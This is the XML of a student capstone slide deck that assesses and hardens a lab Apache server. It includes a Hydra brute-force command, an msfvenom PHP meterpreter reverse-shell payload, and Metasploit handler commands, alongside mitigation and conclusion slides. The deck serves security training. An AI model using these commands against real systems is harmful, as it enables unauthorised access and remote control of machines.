            <a:endParaRPr dirty="0"/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COMMAND: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nano /etc/apache2/apache2.config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Set Options Indexes FollowSymLinks  to Options -Indexes + FollowSymLinks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Mitigation: Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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512399"/>
            <a:ext cx="4465244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file uploads?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i="1" dirty="0"/>
              <a:t>It is very challenging to detect Metasploit attacks, as attacks can be carried out in many ways:  Code injection, Log in keystrokes, open new port services,, XSS, and uploading malicious payloads, etc.  </a:t>
            </a:r>
            <a:endParaRPr sz="1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/>
              <a:t>Instead of running detection, prevention is a better approach.</a:t>
            </a:r>
            <a:endParaRPr sz="1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52944" y="1512399"/>
            <a:ext cx="4781111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file uploads?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i="1" dirty="0"/>
              <a:t>Using OWASP Top 10 approach is better prevention.</a:t>
            </a:r>
            <a:endParaRPr sz="1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AU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i="1" dirty="0"/>
              <a:t>Carry out OWASP Top 10 maintenance  activities base on schedules and monitoring alerts.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" i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400" b="1" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr sz="34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0886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Conclusion</a:t>
            </a:r>
            <a:endParaRPr dirty="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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="840509"/>
            <a:ext cx="8409300" cy="3894667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
              <a:alpha val="145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en-AU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In conclusion, the key vulnerability of the target machine was poor password policies, login control</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en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kumimoji="0" lang="en-AU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lack of</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en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sensitive data policies. If these vulnerability were attended to, the attacks would not </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU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ha</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en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ve been easily carried out.  As discussed, add eg.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en" sz="20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Increase password length.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Increase password complexity.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Limit login attempts.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Implement captcha.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Use multi-factor authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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AU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harden </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU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kumimoji="0" lang="en-AU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.</a:t>
            </a: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69684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29</a:t>
            </a:fld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6824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1A069-75BC-4E09-B0A2-ACE1D2A4F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B9191-39C9-4D1D-B9BA-6C49D104E4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4F66A-4462-4758-B923-6194C8CED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0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Code/Command used for : Finding the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr dirty="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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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Firefox brower was used, and was able to read the content of the sensitive file.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1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5F7BE-8D63-48F8-A9F7-34A97C91D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486" y="870564"/>
            <a:ext cx="6349581" cy="40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86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Code/Command used for : Uncovering the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="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162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF779A3-D938-4AB8-AB11-233E3B6A29EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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Hydra was used to carried out the brute force attack.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1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F996CC-DED0-499F-A48C-AC947D793684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1946566" y="804291"/>
            <a:ext cx="7017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Command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hydra –l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ashton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–P rockyou.txt –s 80 –f –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sV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192.168.1.105 http-get /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company_folders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secret_folder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473A3-16AC-4627-802D-D0DA3F75F0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73390" y="2283806"/>
            <a:ext cx="6890504" cy="2632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0D6D53-754E-4CC0-B140-8109A3BD70E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971669" y="1926230"/>
            <a:ext cx="4585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Screen output: </a:t>
            </a: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0352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Code/Command used for for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webdav vulnerability attack</a:t>
            </a:r>
            <a:endParaRPr dirty="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162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BF8C5D-D9F2-4DEB-AFBE-E8A3602CFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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CrackStation was used to crack the once the hash key was obtained in the hidden file.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en" sz="1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File Manager was used to copy the payload for the metrosploit attack to the webdav direcotry.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1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B0465-2239-445B-842F-ABAB8CE070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08916" y="1190234"/>
            <a:ext cx="3627755" cy="3427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84E3E0-0550-43E5-AC7E-F61C4BAF3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293" y="1188478"/>
            <a:ext cx="2768775" cy="35295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0B3CB9-3177-465C-A8E1-77BED75AB0D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189019" y="812800"/>
            <a:ext cx="4585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Screen outputs: </a:t>
            </a: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5779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Code/Command used for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit attack</a:t>
            </a:r>
            <a:endParaRPr dirty="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162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BF8C5D-D9F2-4DEB-AFBE-E8A3602CFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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AU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kumimoji="0" lang="en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sfvenom was used to create the payload file.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en" sz="1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en" sz="1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en" sz="1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en" sz="1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AU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kumimoji="0" lang="en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sfconsole was used to setup a reverse shell</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1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B3CB9-3177-465C-A8E1-77BED75AB0D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1925781" y="750457"/>
            <a:ext cx="70034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Command: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7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msfvenom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–p php/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meterpreter_reverse_tcp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 LHOST=192.168.1.105 LPORT=80 –f raw &gt; shell.php </a:t>
            </a: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31A62-EEC0-4C1B-B215-419A0DD3D4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66863" y="1119584"/>
            <a:ext cx="3662391" cy="10423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0ACD31-2B7F-4181-AC24-2FAADF2FBB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5174674" y="750457"/>
            <a:ext cx="16177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Screen output: </a:t>
            </a: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9B255B-FC1B-4B2F-A7DC-126C874E399E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988127" y="2417397"/>
            <a:ext cx="70034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Commands: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 use exploit/multi/handler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 set LHOST 192.168.1.90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 set LPORT 4444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 set payload php/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meterpreter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reverse_tpc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exploit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 Shell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3E0E25-1503-4A7A-BFB6-2FDAD23113D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5174674" y="2388720"/>
            <a:ext cx="2521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Screen output: </a:t>
            </a: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7B2A9B-7B91-4E5A-A293-194F37326B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66863" y="2747392"/>
            <a:ext cx="3662391" cy="210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84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Code/Command used for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit attack 2/2</a:t>
            </a:r>
            <a:endParaRPr dirty="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162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BF8C5D-D9F2-4DEB-AFBE-E8A3602CFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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AU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Firefox was used to execute the payload</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en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en" sz="1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en" sz="1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en" sz="1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Commmands use in the Shell Session @ meterpreter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ACD31-2B7F-4181-AC24-2FAADF2FBB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988127" y="738162"/>
            <a:ext cx="16177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Screen output: </a:t>
            </a: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3E0E25-1503-4A7A-BFB6-2FDAD23113D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988127" y="2199021"/>
            <a:ext cx="2521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Screen output: </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-A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1AF6A7-C11C-4170-A83E-F1D6F72A1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041" y="1013485"/>
            <a:ext cx="3803558" cy="1111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110D29-E0AD-46E2-9332-7EA86E4D33F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40042" y="2449887"/>
            <a:ext cx="4430092" cy="233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48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4</a:t>
            </a:fld>
            <a:endParaRPr sz="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273600" y="915841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690800"/>
            <a:ext cx="1814100" cy="40044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EB713-78B7-414A-A9BC-2D37FA928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0" y="915841"/>
            <a:ext cx="6699599" cy="3902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F3A37B-3C7E-4EA7-B2C1-A65513C4A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300" y="809042"/>
            <a:ext cx="1814100" cy="4004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6</a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068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7" name="Google Shape;1077;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1221915134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{22C2846D-6DAD-4640-8CFD-54061075D8CE}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 (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU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</a:t>
                      </a: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(log collector)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Ml-rEfVm-684427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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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5" name="Google Shape;1085;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2522615253"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="299677" y="1183051"/>
          <a:ext cx="8529974" cy="3870810"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{22C2846D-6DAD-4640-8CFD-54061075D8CE}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2838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59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789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7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listing enabled on apache web server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use browser to read full contents of directories on capstone apache web server.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 revealed user ashton is the administrator for the directory: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/company_folders/secret_folder/ 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59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&amp; no failed password lockout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found in dictionary “rockyou”. No lockout for failed login attempts allowing brute force attack.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provided access to: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/secret_folder/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hash for Ashton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Dev://192.168.1.105/webdav/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7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</a:t>
                      </a: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Vulnerability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website contains information that ashton has control of the secret folder.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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="1D1C1D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Slack-Lato"/>
                        </a:rPr>
                        <a:t>This gives a hacker the information that Ashton’s credentials will give access to the secret folder.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11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Metasploit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Enable to listening into the target machine via a payload.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oboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Established a shell to the targeted machine and able to navigate file directories and obtain system information of the target machine.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1AB6-91CC-4E52-AE93-7FD03EEC9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edium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Vulnerability Assessment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C1613-FE37-47FF-A6B3-ED83FC002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80610B3-61A0-42A9-A4C4-C414F758A51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932B15-3202-4768-9B3B-EB4C222E1D2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139700" indent="0">
              <a:buNone/>
            </a:pP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BC06AB-486B-4FCF-83C0-D113A91C3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0" y="616352"/>
            <a:ext cx="9144000" cy="84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382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2055</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>306</Paragraphs>
  <Slides>35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Roboto Medium</vt:lpstr>
      <vt:lpstr>Slack-Lato</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</vt:lpstr>
      <vt:lpstr>Execute Summary</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation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Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Directory Listing Enabled on Apache</vt:lpstr>
      <vt:lpstr>Exploitation: Weak Password &amp; No Failed Password Lockout</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploitation: [Brute Force Attack Vulnerability]</vt:lpstr>
      <vt:lpstr>Exploitation: Open ports Vulnerability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Reverse Shell Uploads</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Appendix</vt:lpstr>
      <vt:lpstr>Code/Command used for : Finding the Hidden Directory</vt:lpstr>
      <vt:lpstr>Code/Command used for : Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Code/Command used for for: webdav vulnerability attack</vt:lpstr>
      <vt:lpstr>Code/Command used for: Metasploit attack</vt:lpstr>
      <vt:lpstr>Code/Command used for: Metasploit attack 2/2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dc:creator>61450</dc:creator>
  <cp:lastModifiedBy>Lucas Domanski</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-12T06:01:46Z</dcterms:modified>
</cp:coreProperties>
</file>